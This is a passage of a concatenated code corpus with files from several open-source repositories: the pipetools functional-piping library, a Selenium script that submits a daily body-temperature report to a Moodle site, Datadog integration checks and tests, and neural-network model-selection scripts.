# Setting p.eval.samples_per_summary to a large value ensures that dev,
# devother, test, testother are evaluated completely (since num_samples for
# each of these sets is less than 5000), while train summaries will be
# computed on 5000 examples.
p.eval.samples_per_summary = 5000
p.eval.decoder_samples_per_summary = 0
# Use variational weight noise to prevent overfitting.
p.vn.global_vn = True
p.train.vn_std = 0.075
p.train.vn_start_step = 20000
return p
``` |
{
"source": "0101/pipetools",
"score": 2
} |
#### File: pipetools/build_scripts/generate_readme.py
```python
import codecs
import re
from pipetools import foreach, X, pipe
DOC_ROOT = 'https://0101.github.io/pipetools/doc/'
readme_template = """
Pipetools
=========
|tests-badge| |coverage-badge| |pypi-badge|
.. |tests-badge| image:: https://github.com/0101/pipetools/actions/workflows/tests.yml/badge.svg
:target: https://github.com/0101/pipetools/actions/workflows/tests.yml
.. |coverage-badge| image:: https://raw.githubusercontent.com/0101/pipetools/master/coverage.svg
:target: https://github.com/0101/pipetools/actions/workflows/tests.yml
.. |pypi-badge| image:: https://img.shields.io/pypi/dm/pipetools.svg
:target: https://pypi.org/project/pipetools/
`Complete documentation <{0}>`_
{{0}}
But wait, there is more
-----------------------
Checkout `the Maybe pipe <{0}maybe>`_, `partial application on steroids <{0}xpartial>`_
or `automatic data structure creation <{0}pipeutils#automatic-data-structure-creation>`_
in the `full documentation <{0}#contents>`_.
""".format(DOC_ROOT)
link_template = u"`{text} <%s{url}>`_" % DOC_ROOT
link_replacements = (
# :doc:`pipe-utils' documentation<pipeutils>`.
(r":doc:`([^<]*)<([^>]*)>`", {'url': r'\2.html', 'text': r'\1'}),
# :func:`~pipetools.utils.where`
(r":func:`~pipetools\.utils\.([^`]*)`",
{'url': r'pipeutils.html#pipetools.utils.\1', 'text': r'\1()'}),
) > foreach([X[0] | re.compile, X[1] | link_template])
def create_readme():
with codecs.open('docs/source/overview.rst', 'r', 'utf-8') as overview:
with codecs.open('README.rst', 'w+', 'utf-8') as readme:
overview.read() > pipe | fix_links | readme_template | readme.write
def fix_links(string):
for pattern, replacement in link_replacements:
string = pattern.sub(replacement, string)
return string
if __name__ == '__main__':
create_readme()
```
#### File: pipetools/pipetools/main.py
```python
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
from functools import partial, wraps, WRAPPER_ASSIGNMENTS
from pipetools.debug import get_name, set_name, repr_args
from pipetools.compat import text_type, string_types, dict_items
class Pipe(object):
"""
Pipe-style combinator.
Example::
p = pipe | F | G | H
p(x) == H(G(F(x)))
"""
def __init__(self, func=None):
self.func = func
self.__name__ = 'Pipe'
def __str__(self):
return get_name(self.func)
__repr__ = __str__
@staticmethod
def compose(first, second):
name = lambda: '{0} | {1}'.format(get_name(first), get_name(second))
def composite(*args, **kwargs):
return second(first(*args, **kwargs))
return set_name(name, composite)
@classmethod
def bind(cls, first, second, new_cls=None):
return (new_cls or cls)(
first if second is None else
second if first is None else
cls.compose(first, second))
def __or__(self, next_func):
# Handle multiple pipes in pipe definition and also changing pipe type to e.g. Maybe
# this is needed because of evaluation order
pipe_in_a_pipe = isinstance(next_func, Pipe) and next_func.func is None
new_cls = type(next_func) if pipe_in_a_pipe else None
next = None if pipe_in_a_pipe else prepare_function_for_pipe(next_func)
return self.bind(self.func, next, new_cls)
def __ror__(self, prev_func):
return self.bind(prepare_function_for_pipe(prev_func), self.func)
def __lt__(self, thing):
return self.func(thing) if self.func else thing
def __call__(self, *args, **kwargs):
return self.func(*args, **kwargs)
def __get__(self, instance, owner):
return partial(self, instance) if instance else self
pipe = Pipe()
class Maybe(Pipe):
@staticmethod
def compose(first, second):
name = lambda: '{0} ?| {1}'.format(get_name(first), get_name(second))
def composite(*args, **kwargs):
result = first(*args, **kwargs)
return None if result is None else second(result)
return set_name(name, composite)
def __call__(self, *args, **kwargs):
if len(args) == 1 and args[0] is None and not kwargs:
return None
return self.func(*args, **kwargs)
def __lt__(self, thing):
return (
None if thing is None else
self.func(thing) if self.func else
thing)
maybe = Maybe()
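# Illustrative usage of the Maybe pipe:
#   g = maybe | str.strip | str.upper
#   g(' ab ')  -> 'AB'
#   g(None)    -> None   (short-circuits instead of raising)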
def prepare_function_for_pipe(thing):
if isinstance(thing, XObject):
return ~thing
if isinstance(thing, tuple):
return xpartial(*thing)
if isinstance(thing, string_types):
return StringFormatter(thing)
if callable(thing):
return thing
raise ValueError('Cannot pipe %s' % thing)
def StringFormatter(template):
f = text_type(template).format
def format(content):
if isinstance(content, dict):
return f(**content)
if _iterable(content):
return f(*content)
return f(content)
return set_name(lambda: "format('%s')" % template[:20], format)
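# Illustrative usage:
#   StringFormatter('{name} is {age}')({'name': 'Rex', 'age': 2})  -> 'Rex is 2'
#   StringFormatter('{0}-{1}')(['a', 'b'])                          -> 'a-b'
#   StringFormatter('got {0}')(42)                                  -> 'got 42'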
def _iterable(obj):
"Iterable but not a string"
return isinstance(obj, Iterable) and not isinstance(obj, string_types)
class XObject(object):
def __init__(self, func=None):
self._func = func
set_name(lambda: get_name(func) if func else 'X', self)
def __repr__(self):
return get_name(self)
def __invert__(self):
return self._func or set_name('X', lambda x: x)
def bind(self, name, func):
set_name(name, func)
return XObject((self._func | func) if self._func else (pipe | func))
def __call__(self, *args, **kwargs):
name = lambda: 'X(%s)' % repr_args(*args, **kwargs)
return self.bind(name, lambda x: x(*args, **kwargs))
def __hash__(self):
return super(XObject, self).__hash__()
def __eq__(self, other):
return self.bind(lambda: 'X == {0!r}'.format(other), lambda x: x == other)
def __getattr__(self, name):
return self.bind(lambda: 'X.{0}'.format(name), lambda x: getattr(x, name))
def __getitem__(self, item):
return self.bind(lambda: 'X[{0!r}]'.format(item), lambda x: x[item])
def __gt__(self, other):
return self.bind(lambda: 'X > {0!r}'.format(other), lambda x: x > other)
def __ge__(self, other):
return self.bind(lambda: 'X >= {0!r}'.format(other), lambda x: x >= other)
def __lt__(self, other):
return self.bind(lambda: 'X < {0!r}'.format(other), lambda x: x < other)
def __le__(self, other):
return self.bind(lambda: 'X <= {0!r}'.format(other), lambda x: x <= other)
def __mod__(self, y):
return self.bind(lambda: 'X % {0!r}'.format(y), lambda x: x % y)
def __ne__(self, other):
return self.bind(lambda: 'X != {0!r}'.format(other), lambda x: x != other)
def __neg__(self):
return self.bind(lambda: '-X', lambda x: -x)
def __mul__(self, other):
return self.bind(lambda: 'X * {0!r}'.format(other), lambda x: x * other)
def __floordiv__(self, other):
return self.bind(lambda: 'X / {0!r}'.format(other), lambda x: x // other)
def __div__(self, other):
return self.bind(lambda: 'X / {0!r}'.format(other), lambda x: x / other)
def __truediv__(self, other):
return self.bind(lambda: 'X / {0!r}'.format(other), lambda x: x / other)
def __add__(self, other):
return self.bind(lambda: 'X + {0!r}'.format(other), lambda x: x + other)
def __sub__(self, other):
return self.bind(lambda: 'X - {0!r}'.format(other), lambda x: x - other)
def __pow__(self, other):
return self.bind(lambda: 'X ** {0!r}'.format(other), lambda x: x ** other)
def __ror__(self, func):
return pipe | func | self
def __or__(self, func):
if isinstance(func, Pipe):
return func.__ror__(self)
return pipe | self | func
def _in_(self, y):
return self.bind(lambda: 'X._in_({0!r})'.format(y), lambda x: x in y)
X = XObject()
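# Illustrative usage: ~X materialises the recorded operations as a plain callable,
# e.g. (~(X.upper()))('abc') -> 'ABC', and inside a pipe: (pipe | X + 1 | X * 2)(3) -> 8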
def xpartial(func, *xargs, **xkwargs):
"""
Like :func:`functools.partial`, but can take an :class:`XObject`
placeholder that will be replaced with the first positional argument
when the partially applied function is called.
Useful when the function's positional arguments' order doesn't fit your
situation, e.g.:
>>> reverse_range = xpartial(range, X, 0, -1)
>>> reverse_range(5)
[5, 4, 3, 2, 1]
It can also be used to transform the positional argument to a keyword
argument, which can come in handy inside a *pipe*::
xpartial(objects.get, id=X)
Also the XObjects are evaluated, which can be used for some sort of
destructuring of the argument::
xpartial(somefunc, name=X.name, number=X.contacts['number'])
Lastly, unlike :func:`functools.partial`, this creates a regular function
which will bind to classes (like the ``curry`` function from
``django.utils.functional``).
"""
any_x = any(isinstance(a, XObject) for a in xargs + tuple(xkwargs.values()))
use = lambda x, value: (~x)(value) if isinstance(x, XObject) else x
@wraps(func, assigned=filter(partial(hasattr, func), WRAPPER_ASSIGNMENTS))
def xpartially_applied(*func_args, **func_kwargs):
if any_x:
if not func_args:
raise ValueError('Function "%s" partially applied with an '
'X placeholder but called with no positional arguments.'
% get_name(func))
first = func_args[0]
rest = func_args[1:]
args = tuple(use(x, first) for x in xargs) + rest
kwargs = dict((k, use(x, first)) for k, x in dict_items(xkwargs))
kwargs.update(func_kwargs)
else:
args = xargs + func_args
kwargs = dict(xkwargs, **func_kwargs)
return func(*args, **kwargs)
name = lambda: '%s(%s)' % (get_name(func), repr_args(*xargs, **xkwargs))
return set_name(name, xpartially_applied)
``` |
{
"source": "010Ri/BodyTemperature-Reporting-System-For-Moodle",
"score": 3
} |
#### File: 010Ri/BodyTemperature-Reporting-System-For-Moodle/bodytemperature-report-sample.py
```python
from selenium import webdriver
from time import sleep
from selenium.webdriver.chrome.options import Options
# elements for log in LMS (moodle) : ログインに必要な要素
USERNAME = 'USERNAME'
PASSWORD = 'PASSWORD'
# elements for filling form : 体温報告に必要な要素
BodyTemperature = input('今日の体温を入力してください(少数点第一位まで):')
Others = '特になし'
# initializes 初期設定
error_flg = False
target_url = 'URL' # moodle URL
# FUNCTION access : str == button name , click automatically and redirect to next page : access関数の定義:ボタンの名前をstrで指定し、クリックして次の画面へ進む
def access(str):
    global error_flg  # without this the assignment in the except block would only create a local variable
    try:
access_button = driver.find_element_by_link_text(str)
access_button.click()
sleep(3)
except Exception:
error_flg = True
print(str + 'ボタン押下時にエラーが発生しました。')
# turn on WebDriver : WebDriverの起動
options = Options()
options.add_argument('--headless') # comment this line out to disable headless mode
driver = webdriver.Chrome(r'C:\Program Files (x86)\Google\Chrome\chromedriver', options=options)
driver.get(target_url)
sleep(3)
# login process : ログイン処理
if error_flg is False:
try:
username_input = driver.find_element_by_name("username")
username_input.send_keys(USERNAME)
sleep(1)
password_input = driver.find_element_by_name("password")
password_input.send_keys(PASSWORD)
sleep(1)
username_input.submit()
sleep(1)
except Exception:
print('ユーザー名、パスワード入力時にエラーが発生しました。')
error_flg = True
# press take-exam-again button
if error_flg is False:
try:
again_button = driver.find_element_by_xpath('//form/button[@type="submit"]')
again_button.click()
sleep(3)
except Exception:
error_flg = True
print('もう一度受験するボタン押下時にエラーが発生しました。')
# fill form
if error_flg is False:
try:
BodyTemperature_input = driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div/section[1]/div[1]/form/div/div[1]/div[2]/div[1]/div[2]/span/input')
BodyTemperature_input.send_keys(BodyTemperature)
sleep(1)
others_input = driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div/section[1]/div[1]/form/div/div[3]/div[2]/div/div[2]/label/span/input')
others_input.send_keys(Others)
sleep(1)
except Exception:
print('体温の入力時にエラーが発生しました。')
error_flg = True
if error_flg is False:
try:
Q_button = driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div/section[1]/div[1]/form/div/div[2]/div[2]/div/div[2]/div[2]/div[1]/input[2]')
driver.execute_script("arguments[0].click();",Q_button)
sleep(3)
except Exception:
error_flg = True
print('症状のボタン押下時にエラーが発生しました。')
# press finish-exam button
if error_flg is False:
try:
next_button = driver.find_element_by_name('next')
next_button.click()
sleep(3)
except Exception:
error_flg = True
print('テストを終了する ...ボタン押下時にエラーが発生しました。')
if error_flg is False:
try:
submit_button = driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div/section[1]/div[1]/div[3]/div/div/form/button')
submit_button.click()
sleep(3)
except Exception:
error_flg = True
print('すべての解答を送信して終了するボタン押下時にエラーが発生しました。')
if error_flg is False:
try:
check_button = driver.find_element_by_xpath('/html/body/div[4]/div[3]/div/div[2]/div/div[2]/input[1]')
check_button.click()
sleep(3)
except Exception:
error_flg = True
print('「確認」すべての解答を送信して終了するボタン押下時にエラーが発生しました。')
if error_flg is False:
access('レビューを終了する')
if error_flg is False:
print('体温報告を完了しました。')
# putting away : 片付け
driver.close()
``` |
{
"source": "01100010011001010110010101110000/integrations-core",
"score": 2
} |
#### File: aerospike/tests/test_unit.py
```python
import copy
import mock
import pytest
from datadog_checks import aerospike
from . import common
pytestmark = pytest.mark.unit
METRICS = [
'aerospike.datacenter.dc_timelag',
'aerospike.datacenter.dc_rec_ship_attempts',
'aerospike.datacenter.dc_delete_ship_attempts',
'aerospike.datacenter.dc_remote_ship_ok',
'aerospike.datacenter.dc_err_ship_client',
'aerospike.datacenter.dc_err_ship_server',
'aerospike.datacenter.dc_esmt_bytes_shipped',
'aerospike.datacenter.dc_esmt_ship_avg_comp_pct',
'aerospike.datacenter.dc_latency_avg_ship',
'aerospike.datacenter.dc_remote_ship_avg_sleep',
'aerospike.datacenter.dc_open_conn',
'aerospike.datacenter.dc_recs_inflight',
'aerospike.datacenter.dc_size',
]
def test_datacenter_metrics(aggregator):
check = aerospike.AerospikeCheck('aerospike', {}, [common.INSTANCE])
original_get_info = check.get_info
def mock_get_info(command, separator=";"):
if command == 'dcs':
return ['test']
elif command.startswith("dc/"):
return common.DATACENTER_METRICS
return original_get_info(command, separator)
check.get_info = mock_get_info
check._client = mock.MagicMock()
check.get_namespaces = mock.MagicMock()
check.collect_info = mock.MagicMock()
check.collect_throughput = mock.MagicMock()
check.collect_latency = mock.MagicMock()
check.collect_version = mock.MagicMock()
check.check(common.INSTANCE)
for metric in METRICS:
aggregator.assert_metric(metric)
def connection_uses_tls():
instance = copy.deepcopy(common.INSTANCE)
tls_config = {'cafile': 'my-ca-file', 'certfile': 'my-certfile', 'keyfile': 'my-keyfile'}
instance['tls_config'] = copy.deepcopy(tls_config)
    check = aerospike.AerospikeCheck('aerospike', {}, [instance])
tls_config['enable'] = True
assert check._tls_config == tls_config
with mock.patch('aerospike.client') as client:
check.get_client()
assert client.called_with({'host': check._host, 'tls': tls_config})
```
#### File: airflow/tests/test_check_metrics_up_to_date.py
```python
import re
import requests
# Make sure this expected metrics list is up to date with:
# - `dogstatsd_mapper_profiles` configuration from README.md
# - metadata.csv
EXPECTED_METRICS = [
'<job_name>_start',
'<job_name>_end',
'operator_failures_<operator_name>',
'operator_successes_<operator_name>',
'ti_failures',
'ti_successes',
'zombies_killed',
'scheduler_heartbeat',
'dag_processing.processes',
'scheduler.tasks.killed_externally',
'dagbag_size',
'dag_processing.import_errors',
'dag_processing.total_parse_time',
'dag_processing.last_runtime.<dag_file>',
'dag_processing.last_run.seconds_ago.<dag_file>',
'dag_processing.processor_timeouts',
'executor.open_slots',
'executor.queued_tasks',
'executor.running_tasks',
'pool.open_slots.<pool_name>',
'pool.used_slots.<pool_name>',
'pool.starving_tasks.<pool_name>',
'dagrun.dependency-check.<dag_id>',
'dag.<dag_id>.<task_id>.duration',
'dag_processing.last_duration.<dag_file>',
'dagrun.duration.success.<dag_id>',
'dagrun.duration.failed.<dag_id>',
'dagrun.schedule_delay.<dag_id>',
]
METRIC_PATTERN = re.compile(r'^``([^`]+)``\s+(.*)', re.MULTILINE)
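# e.g. a metrics.rst line such as "``ti_failures``    Overall task instance failures"
# is captured as the pair ('ti_failures', 'Overall task instance failures')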
def test_check_metrics_up_to_date():
url = 'https://raw.githubusercontent.com/apache/airflow/master/docs/metrics.rst'
resp = requests.get(url)
content = resp.content.decode('utf-8')
matches = METRIC_PATTERN.findall(content)
# Printed only on failure for convenience.
print("Metric from {} :".format(url))
print("")
for metric, desc in matches:
print("{:50} {}".format(metric, desc))
metrics = [m for m, desc in matches]
assert EXPECTED_METRICS == metrics
```
#### File: datadog_checks/aspdotnet/aspdotnet.py
```python
try:
from datadog_checks.base import PDHBaseCheck
except ImportError:
class PDHBaseCheck:
pass
EVENT_TYPE = SOURCE_TYPE_NAME = 'aspdotnet'
DEFAULT_COUNTERS = [
# counterset, instance of counter, counter name, metric name
# This set is from the Microsoft recommended counters to monitor exchange:
# https://technet.microsoft.com/en-us/library/dn904093%28v=exchg.150%29.aspx?f=255&MSPPError=-2147217396
# ASP.Net
["ASP.NET", None, "Application Restarts", "aspdotnet.application_restarts", "gauge"],
["ASP.NET", None, "Worker Process Restarts", "aspdotnet.worker_process_restarts", "gauge"],
["ASP.NET", None, "Request Wait Time", "aspdotnet.request.wait_time", "gauge"],
# ASP.Net Applications
[
"ASP.NET Applications",
None,
"Requests In Application Queue",
"aspdotnet.applications.requests.in_queue",
"gauge",
],
["ASP.NET Applications", None, "Requests Executing", "aspdotnet.applications.requests.executing", "gauge"],
["ASP.NET Applications", None, "Requests/Sec", "aspdotnet.applications.requests.persec", "gauge"],
[
"ASP.NET Applications",
None,
"Forms Authentication Failure",
"aspdotnet.applications.forms_authentication.failure",
"gauge",
],
[
"ASP.NET Applications",
None,
"Forms Authentication Success",
"aspdotnet.applications.forms_authentication.successes",
"gauge",
],
]
class AspdotnetCheck(PDHBaseCheck):
def __init__(self, name, init_config, agentConfig, instances=None):
PDHBaseCheck.__init__(self, name, init_config, agentConfig, instances=instances, counter_list=DEFAULT_COUNTERS)
```
#### File: couch/tests/conftest.py
```python
import json
import os
from collections import defaultdict
from copy import deepcopy
from time import sleep
import pytest
import requests
from datadog_checks.couch import CouchDb
from datadog_checks.dev import WaitFor, docker_run
from datadog_checks.dev.conditions import CheckEndpoints
from . import common
@pytest.fixture
def check():
if common.COUCH_MAJOR_VERSION == 1:
return CouchDb(common.CHECK_NAME, {}, instances=[common.BASIC_CONFIG])
elif common.COUCH_MAJOR_VERSION == 2:
return CouchDb(common.CHECK_NAME, {}, instances=[common.BASIC_CONFIG_V2])
@pytest.fixture
def instance():
if common.COUCH_MAJOR_VERSION == 1:
return deepcopy(common.BASIC_CONFIG)
elif common.COUCH_MAJOR_VERSION == 2:
return deepcopy(common.BASIC_CONFIG_V2)
@pytest.fixture
def active_tasks():
"""
Returns a raw response from `/_active_tasks`
"""
with open(os.path.join(common.HERE, 'fixtures', '_active_tasks.json')) as f:
return json.loads(f.read())
@pytest.fixture(scope="session")
def dd_environment():
"""
Start a cluster with one master, one replica and one unhealthy replica and
stop it after the tests are done.
If there's any problem executing docker-compose, let the exception bubble
up.
"""
couch_version = os.environ["COUCH_VERSION"][0]
with docker_run(
compose_file=os.path.join(common.HERE, 'compose', 'compose_v{}.yaml'.format(couch_version)),
env_vars={'COUCH_PORT': common.PORT},
conditions=[
CheckEndpoints([common.URL]),
lambda: generate_data(couch_version),
WaitFor(send_replication, args=(couch_version,)),
WaitFor(get_replication, args=(couch_version,)),
],
):
if couch_version == '1':
yield common.BASIC_CONFIG
elif couch_version == '2':
yield common.BASIC_CONFIG_V2
def send_replication(couch_version):
"""
Send replication task to trigger tasks
"""
if couch_version == '1':
return
replicator_url = "{}/_replicator".format(common.NODE1['server'])
replication_body = {
'_id': 'my_replication_id',
'source': 'http://dduser:[email protected]:5984/kennel',
'target': 'http://dduser:[email protected]:5984/kennel_replica',
'create_target': True,
'continuous': True,
}
r = requests.post(
replicator_url,
auth=(common.NODE1['user'], common.NODE1['password']),
headers={'Content-Type': 'application/json'},
json=replication_body,
)
r.raise_for_status()
def get_replication(couch_version):
"""
Attempt to get active replication tasks
"""
if couch_version == '1':
return
task_url = "{}/_active_tasks".format(common.NODE1['server'])
r = requests.get(task_url, auth=(common.NODE1['user'], common.NODE1['password']))
r.raise_for_status()
count = len(r.json())
return count > 0
def generate_data(couch_version):
"""
Generate data on the couch cluster to test metrics.
"""
# pass in authentication info for version 2
auth = (common.USER, common.PASSWORD) if couch_version == "2" else None
headers = {'Accept': 'text/json'}
# Generate a test database
requests.put("{}/kennel".format(common.URL), auth=auth, headers=headers)
# Populate the database
data = {
"language": "javascript",
"views": {
"all": {"map": "function(doc) { emit(doc._id); }"},
"by_data": {"map": "function(doc) { emit(doc.data, doc); }"},
},
}
requests.put("{}/kennel/_design/dummy".format(common.URL), json=data, auth=auth, headers=headers)
urls = [
"{}/_node/[email protected]/_stats".format(common.URL),
"{}/_node/[email protected]/_stats".format(common.URL),
"{}/_node/[email protected]/_stats".format(common.URL),
]
ready = defaultdict(bool)
for _ in range(120):
print("Waiting for stats to be generated on the nodes...")
try:
for url in urls:
if not ready[url]:
res = requests.get(url, auth=auth, headers=headers)
if res.json():
ready[url] = True
if len(ready) and all(ready.values()):
break
except Exception:
pass
sleep(1)
if couch_version == "1":
return
doc_url = "{}/_replicator/_all_docs".format(common.URL)
for _ in range(120):
try:
res = requests.get(doc_url, auth=auth, headers=headers)
data = res.json()
if data.get('rows'):
break
except Exception:
pass
sleep(1)
```
#### File: tests/tooling/test_utils.py
```python
import os
import mock
from datadog_checks.dev.tooling.config import copy_default_config
from datadog_checks.dev.tooling.utils import (
complete_set_root,
get_version_string,
initialize_root,
parse_agent_req_file,
)
from ..common import not_windows_ci
def test_parse_agent_req_file():
contents = "datadog-active-directory==1.1.1; sys_platform == 'win32'\nthis is garbage"
catalog = parse_agent_req_file(contents)
assert len(catalog) == 1
assert catalog['datadog-active-directory'] == '1.1.1'
def test_get_version_string():
with mock.patch('datadog_checks.dev.tooling.utils.read_version_file') as read:
read.return_value = '__version__ = "2.0.0"'
assert get_version_string('foo_check') == '2.0.0'
@mock.patch('datadog_checks.dev.tooling.utils.get_root')
@mock.patch('datadog_checks.dev.tooling.utils.set_root')
def test_initialize_root_bad_path(set_root, get_root):
get_root.return_value = ''
# bad path in config results in cwd
config = copy_default_config()
config['core'] = '/path/does/not/exist'
initialize_root(config)
assert set_root.called
set_root.assert_called_with(os.getcwd())
@mock.patch('datadog_checks.dev.tooling.utils.get_root')
@mock.patch('datadog_checks.dev.tooling.utils.set_root')
def test_initialize_root_good_path(set_root, get_root):
get_root.return_value = ''
# good path in config uses that
config = copy_default_config()
config['core'] = '~'
initialize_root(config)
assert set_root.called
set_root.assert_called_with(os.path.expanduser('~'))
@not_windows_ci
@mock.patch('datadog_checks.dev.tooling.utils.get_root')
@mock.patch('datadog_checks.dev.tooling.utils.set_root')
def test_initialize_root_env_var(set_root, get_root):
get_root.return_value = ''
ddev_env = '/tmp'
with mock.patch.dict(os.environ, {'DDEV_ROOT': ddev_env}):
config = copy_default_config()
initialize_root(config)
assert set_root.called
set_root.assert_called_with(os.path.expanduser(ddev_env))
@not_windows_ci
@mock.patch('datadog_checks.dev.tooling.utils.get_root')
@mock.patch('datadog_checks.dev.tooling.utils.set_root')
def test_complete_set_root_no_args(set_root, get_root):
get_root.return_value = ''
with mock.patch('datadog_checks.dev.tooling.utils.load_config') as load_config:
config = copy_default_config()
config['core'] = '/tmp' # ensure we choose a dir that exists
load_config.return_value = config
args = []
complete_set_root(args)
assert set_root.called
set_root.assert_called_with(config['core'])
@mock.patch('datadog_checks.dev.tooling.utils.get_root')
@mock.patch('datadog_checks.dev.tooling.utils.set_root')
def test_complete_set_root_here(set_root, get_root):
get_root.return_value = ''
with mock.patch('datadog_checks.dev.tooling.utils.load_config') as load_config:
config = copy_default_config()
load_config.return_value = config
args = ['-x']
complete_set_root(args)
assert set_root.called
set_root.assert_called_with(os.getcwd())
@not_windows_ci
@mock.patch('datadog_checks.dev.tooling.utils.get_root')
@mock.patch('datadog_checks.dev.tooling.utils.set_root')
def test_complete_set_root_extras(set_root, get_root):
get_root.return_value = ''
with mock.patch('datadog_checks.dev.tooling.utils.load_config') as load_config:
config = copy_default_config()
config['extras'] = '/tmp' # ensure we choose a dir that exists
load_config.return_value = config
args = ['-e']
complete_set_root(args)
assert set_root.called
set_root.assert_called_with(config['extras'])
```
#### File: ibm_mq/tests/test_ibm_mq_e2e.py
```python
import pytest
from .common import assert_all_metrics
@pytest.mark.e2e
def test_e2e_check_all(dd_agent_check, instance_collect_all):
aggregator = dd_agent_check(instance_collect_all, rate=True)
assert_all_metrics(aggregator)
```
#### File: datadog_checks/snmp/models.py
```python
from typing import Any, Sequence, Tuple, Union
from .exceptions import CouldNotDecodeOID
from .pysnmp_types import ObjectIdentity, ObjectName, ObjectType
from .utils import format_as_oid_string, parse_as_oid_tuple
class OID(object):
"""
An SNMP object identifier.
Acts as a facade for various types used by PySNMP to represent OIDs.
"""
def __init__(self, value):
# type: (Union[Sequence[int], str, ObjectName, ObjectIdentity, ObjectType]) -> None
try:
parts = parse_as_oid_tuple(value)
except CouldNotDecodeOID:
raise # Explicitly re-raise this exception.
# Let's make extra sure we didn't mess up.
if not isinstance(parts, tuple):
raise RuntimeError(
'Expected result {!r} of parsing value {!r} to be a tuple, but got {}'.format(parts, value, type(parts))
) # pragma: no cover
self._parts = parts
def as_tuple(self):
# type: () -> Tuple[int, ...]
return self._parts
def __eq__(self, other):
# type: (Any) -> bool
return isinstance(other, OID) and self.as_tuple() == other.as_tuple()
def __str__(self):
# type: () -> str
return format_as_oid_string(self.as_tuple())
def __repr__(self):
# type: () -> str
return 'OID({!r})'.format(str(self))
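# Illustrative usage (assuming utils.format_as_oid_string renders the familiar dotted form):
#   OID('1.3.6.1.2.1') == OID((1, 3, 6, 1, 2, 1))   and   str(OID((1, 3, 6, 1, 2, 1))) -> '1.3.6.1.2.1'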
```
#### File: datadog_checks/system_swap/system_swap.py
```python
import psutil
# project
from datadog_checks.checks import AgentCheck
class SystemSwap(AgentCheck):
def check(self, instance):
swap_mem = psutil.swap_memory()
tags = instance.get('tags', [])
self.rate('system.swap.swapped_in', swap_mem.sin, tags=tags)
self.rate('system.swap.swapped_out', swap_mem.sout, tags=tags)
```
#### File: tests/legacy/conftest.py
```python
import mock
import pytest
from datadog_checks.vsphere.legacy.vsphere_legacy import VSphereLegacyCheck
from .utils import disable_thread_pool, get_mocked_server
def _instance():
"""
Create a default instance, used by multiple fixtures
"""
return {'name': 'vsphere_mock', 'tags': ['foo:bar']}
@pytest.fixture
def instance():
"""
Return a default instance
"""
return _instance()
@pytest.fixture
def vsphere():
"""
Provide a check instance with mocked parts
"""
# mock the server
server_mock = get_mocked_server()
# create a check instance
check = VSphereLegacyCheck('vsphere', {}, [_instance()])
# patch the check instance
check._get_server_instance = mock.MagicMock(return_value=server_mock)
# return the check after disabling the thread pool
return disable_thread_pool(check)
@pytest.fixture
def aggregator():
from datadog_checks.stubs import aggregator
aggregator.reset()
return aggregator
```
#### File: zk/tests/common.py
```python
import os
from datadog_checks.zk import ZookeeperCheck
ZK_VERSION = os.environ['ZK_VERSION']
MNTR_METRICS = [
'zookeeper.packets_sent',
'zookeeper.approximate_data_size',
'zookeeper.num_alive_connections',
'zookeeper.open_file_descriptor_count',
'zookeeper.avg_latency',
'zookeeper.znode_count',
'zookeeper.outstanding_requests',
'zookeeper.min_latency',
'zookeeper.ephemerals_count',
'zookeeper.watch_count',
'zookeeper.max_file_descriptor_count',
'zookeeper.packets_received',
'zookeeper.max_latency',
]
METRICS_34 = [
'zookeeper.packets.sent',
'zookeeper.latency.avg',
'zookeeper.latency.min',
'zookeeper.connections',
'zookeeper.zxid.epoch',
'zookeeper.bytes_sent',
'zookeeper.bytes_received',
'zookeeper.instances',
'zookeeper.nodes',
'zookeeper.zxid.count',
'zookeeper.packets.received',
'zookeeper.latency.max',
]
def assert_service_checks_ok(aggregator):
aggregator.assert_service_check("zookeeper.ruok", status=ZookeeperCheck.OK)
aggregator.assert_service_check("zookeeper.mode", status=ZookeeperCheck.OK)
``` |
{
"source": "011000101101/Bachelor_Arbeit",
"score": 3
} |
#### File: NeuronalNetworks/combined_project/create_lstm_model_structure_graphs_with_tensorboard.py
```python
from train_model_lstm import *
def train_model_tmp(model: tf.keras.Model, list_of_batches: list,
current_basepath: str):
tensorboard_cb = tf.keras.callbacks.TensorBoard(current_basepath, histogram_freq=1)
x_train = np.asarray([data.coordinate_pairs for data in list_of_batches[0]])
x_train = x_train.reshape(batch_size, len(list_of_batches[0][0].coordinate_pairs), 2)
y_train = np.asarray([data.true_cost for data in list_of_batches[0]])
model.fit(x_train, y_train, epochs=1, callbacks=[tensorboard_cb])
def train_one_model_variant_tmp(lstm_layer_count, dense_layer_count, list_of_batches,
data_validate):
print("\n\n\ntraining model '{}_lstm_layers_{}_dense_layers_{}'\n\n\n".format(
lstm_layer_count, dense_layer_count, "inflating"
))
current_model = define_model(lstm_layer_count, dense_layer_count, "inflating", False)
current_basepath = os.path.abspath(
"./models/tmp/{}_lstm_layers_{}_dense_layers".format(
lstm_layer_count, dense_layer_count
)
)
train_model_tmp(current_model, list_of_batches, current_basepath)
lstm_layer_counts = [3, 2, 1]
dense_layer_counts = [2, 1]
if __name__ == "__main__":
# load train data characteristics
batches, data_val = load_data()
# HPO loop (grid search over few points because of long runtime)
for current_lstm_layer_count in lstm_layer_counts:
for current_dense_layer_count in dense_layer_counts:
train_one_model_variant_tmp(current_lstm_layer_count, current_dense_layer_count,
batches, data_val)
```
#### File: combined_project/model_selection/plot_model_selection.py
```python
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits import mplot3d
import plotly.graph_objects as go
import os
import pickle
import pandas as pd
from model_selection.util import *
with open("runtime_quality_map.pkl", "rb") as f:
runtime_quality_map = pickle.load(f)
def get_score(model: str, fixed_value: tuple) -> float:
circuit, score = fixed_value
quality = runtime_quality_map[(model, circuit)]
if score == "channel_width":
return np.asarray(quality[2][0]).mean()
else: # critical path length
return np.asarray(quality[2][1]).mean()
def plot_model_scores_over_circuit(type: str):
models = os.listdir(rnn_model_base_path if type == "rnn" else cnn_model_base_path)
labels = [eval_circuits[0],
'combined',
eval_circuits[1]]
def plot_model_scores_over_hyperparams(circuit, metric, reference):
    """
    plots model scores over layer definitions (X) and inflation type (+ kernel size) (Y)
    :param circuit: name of the evaluation circuit
    :param metric: score to plot, e.g. "channel_width" or the critical path metric
    :param reference: if True, also draw the reference score as a constant plane
    :return:
    """
# models_cnn = os.listdir(cnn_model_base_path)
# models_rnn = os.listdir(rnn_model_base_path)
#
# # layer defs
